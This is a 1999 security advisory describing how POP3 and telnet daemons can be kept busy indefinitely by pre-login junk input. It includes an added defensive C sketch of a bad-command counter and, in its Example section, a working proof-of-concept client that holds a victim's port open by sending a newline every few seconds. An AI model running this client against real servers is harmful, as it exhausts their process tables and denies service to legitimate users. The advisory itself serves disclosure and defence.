The OpenNET Project
 
KKIS.28041999.002.b


Date: Wed, 28 Apr 1999 13:59:28 +0200
From: Lukasz Luzar <[email protected]>
To: [email protected]
Subject: KKIS.28041999.002.b

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                          ###  ###  ###  ###  ###
                          ### ###   ### ###   ###
                          ######    ######    ###
                          ### ###   ### ###   ###
                          ###  ###  ###  ###  ###

                              S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 KKI Security Team                              Cracow Commercial Internet
 http://www.security.kki.pl                     http://www.kki.pl
 mailto:[email protected]                mailto:[email protected]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Report title        : Flaws in the mechanisms that are meant to prevent
                       parasitic connections from being held open in many
                       TCP network services.
 Problem found by    : Lukasz Luzar ([email protected])
 Report created by   : Robert Pajak ([email protected])
                       Lukasz Luzar ([email protected])
 Report published    : 28 April 1999
 Report code         : KKIS.28041999.002.b
 Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
 Systems affected    : Linux, FreeBSD, Solaris, ...
 Archive             : http://www.security.kki.pl/advisories/
 Risk level          : low

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  The designers of many popular network services include mechanisms that
 are meant to stop a client from holding a parasitic connection to the
 service open indefinitely. The usual form of this protection is an
 inactivity timeout, which closes a connection that has sent nothing for
 a while.
  Some of those designers forget that a malicious client can simply send
 bad or empty commands to the open port at regular intervals, often enough
 that the timeout never fires: any input resets the timer, so the
 connection stays open for as long as the attacker keeps feeding it. This
 can be done before login/password authentication, i.e. without any
 credentials at all.
  Such programs should implement an additional mechanism to handle this
 situation. A good solution is a counter of bad (or empty) commands inside
 the program, with the connection closed once the counter passes a limit.

  A similar mechanism is already applied in sendmail. This solution is
 effective and very easy to implement.

  The lack of such a mechanism can be quite threatening, because most of
 these TCP services run with root privileges, and limiting the number of
 root processes is not easy when the service has no internal limit of its
 own. The whole system is affected when the process table is filled, for
 example by many simultaneously open connections to the vulnerable TCP
 service, each of which costs the server a process.

  The worst case is a vulnerable service that logs nothing about a
 connection before login/password authentication, so the attack leaves no
 trace in the logs. One of the most vulnerable services in this respect
 is cucipop.
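
  The following is an added example of the countermeasure described above;
 it is not code from the advisory or from any of the listed programs. It
 models the pre-authentication command loop of a POP3-style service: every
 line read from the socket goes through gate_feed(), which keeps a counter
 of bad or empty commands and tells the caller to close the connection once
 the counter reaches a limit, independently of the inactivity timeout. The
 limit MAX_BAD, the list of accepted pre-login commands and the sample
 inputs in main() are assumptions made for the example.

```c
/* Added example, not the advisory's code: a pre-authentication
 * command gate for a POP3-style service. A real daemon would call
 * gate_feed() on every line read from the socket (next to its
 * inactivity timeout) and close the socket when it returns GATE_DROP.
 * MAX_BAD, preauth_cmds and the inputs in main() are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_BAD  3      /* bad or empty commands tolerated before login */
#define MAX_LINE 256    /* longest line the parser accepts */

enum gate_verdict { GATE_OK, GATE_DROP };

struct gate {
    int bad;            /* bad/empty commands seen on this connection */
    int total;          /* all lines seen, for the log message */
};

/* Commands a POP3 server accepts in the AUTHORIZATION state (assumed list). */
static const char *const preauth_cmds[] = { "USER", "PASS", "APOP", "QUIT", NULL };

/* Copy the leading keyword of line into verb, upper-cased. Returns 0 if
 * the line is empty or the keyword is longer than any POP3 command. */
static int get_verb(const char *line, char verb[5])
{
    size_t n = 0;
    while (line[n] != '\0' && !isspace((unsigned char)line[n])) {
        if (n == 4)
            return 0;                     /* longer than 4 chars: not a command */
        verb[n] = (char)toupper((unsigned char)line[n]);
        n++;
    }
    verb[n] = '\0';
    return n > 0;
}

/* Judge one received line. Returns GATE_DROP once the bad-command counter
 * reaches MAX_BAD; the caller closes the socket at that point. */
enum gate_verdict gate_feed(struct gate *g, const char *line)
{
    char verb[5];
    int known = 0;

    g->total++;
    if (get_verb(line, verb)) {
        for (const char *const *p = preauth_cmds; *p != NULL; p++)
            if (strcmp(verb, *p) == 0)
                known = 1;
    }
    if (!known && ++g->bad >= MAX_BAD) {
        /* The report's worst case is a service that logs nothing before
         * authentication, so the drop is logged with both counters. */
        fprintf(stderr, "dropping connection: %d bad of %d commands before login\n",
                g->bad, g->total);
        return GATE_DROP;
    }
    return GATE_OK;
}

/* Run a whole input stream ('\n'-separated lines, CRLF tolerated) through
 * the gate. Returns the 1-based index of the line that triggered the
 * drop, or 0 if the stream ended with the connection still acceptable. */
int gate_run(const char *stream)
{
    struct gate g = { 0, 0 };
    char line[MAX_LINE];
    const char *p = stream;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full;
        if (len >= sizeof line)
            len = sizeof line - 1;        /* overlong line: truncated, counts as bad */
        memcpy(line, p, len);
        line[len] = '\0';
        if (gate_feed(&g, line) == GATE_DROP)
            return g.total;
        p = nl ? nl + 1 : p + full;
    }
    return 0;
}

int main(void)
{
    /* Constructed inputs: the advisory's stream of bare newlines, and a
     * normal login that the gate must leave alone. */
    printf("bare newlines: dropped at line %d\n", gate_run("\n\n\n\n\n"));
    printf("normal login:  dropped at line %d\n", gate_run("USER bob\r\nPASS secret\r\n"));
    return 0;
}
```

 With MAX_BAD set to 3 the stream of bare newlines sent by the example
 client is cut off at its third line, while a legitimate USER/PASS
 exchange is never touched. The counter is kept per connection and is
 deliberately not reset by the timeout, so alternating junk with long
 pauses does not help the attacker either.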

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  The example below shows how to open a connection to a service and keep
 it open for an unlimited time by writing a bad (or empty) command to it
 before the server's inactivity timeout can expire.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 --- CUT HERE ---
 /*
  *  example.c by Lukasz Luzar ([email protected])
  *
  *  Holds a connection to a TCP service open indefinitely by writing a
  *  bad (or empty) command every DELAY seconds, so that the server's
  *  inactivity timeout never fires.
  */

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netinet/tcp.h>	/* TCP_NODELAY */
 #include <arpa/inet.h>

 /* victim's address and port of service */
 #define ADDR "10.0.0.1"	/* IP in dotted notation */
 #define PORT 110	/* e.g. some pop3 */
 #define DELAY 4 	/* (4 secs.) how often we are sending bad commands */
 #define COMMAND "\n" 	/* some bad (or null) command */

 int main(void)
 {
 	int	sockfd, k;
 	size_t	j;
 	struct sockaddr_in victim_addr;

 	memset( &victim_addr, 0, sizeof( victim_addr));

 	victim_addr.sin_family = AF_INET;
 	victim_addr.sin_addr.s_addr = inet_addr( ADDR);
 	victim_addr.sin_port = htons( PORT);

 	if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) {
 		perror( "socket");
 		exit( 1);
 	}

 	if( connect( sockfd,(struct sockaddr*) &victim_addr,
 	    sizeof( victim_addr)) < 0) {
 		perror( "connect");
 		exit( 1);
 	}

 	/* push each command out immediately instead of letting Nagle buffer it */
 	k = 1;
 	if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
 		perror( "setsockopt");

 	j = strlen( COMMAND);

 	/* keep the connection alive: one bad command every DELAY seconds */
 	for(;;) {
 		if( write( sockfd,COMMAND,j) == -1) {
 			perror( "write");	/* the server closed or reset the connection */
 			exit( 1);
 		}
 		fprintf( stderr,".");
 		sleep( DELAY);
 	}
 }
 --- CUT HERE ---

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Copyright (c) 1999 KKI Security Team, Poland
 All rights reserved.

 Please address all questions to mailto:[email protected]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
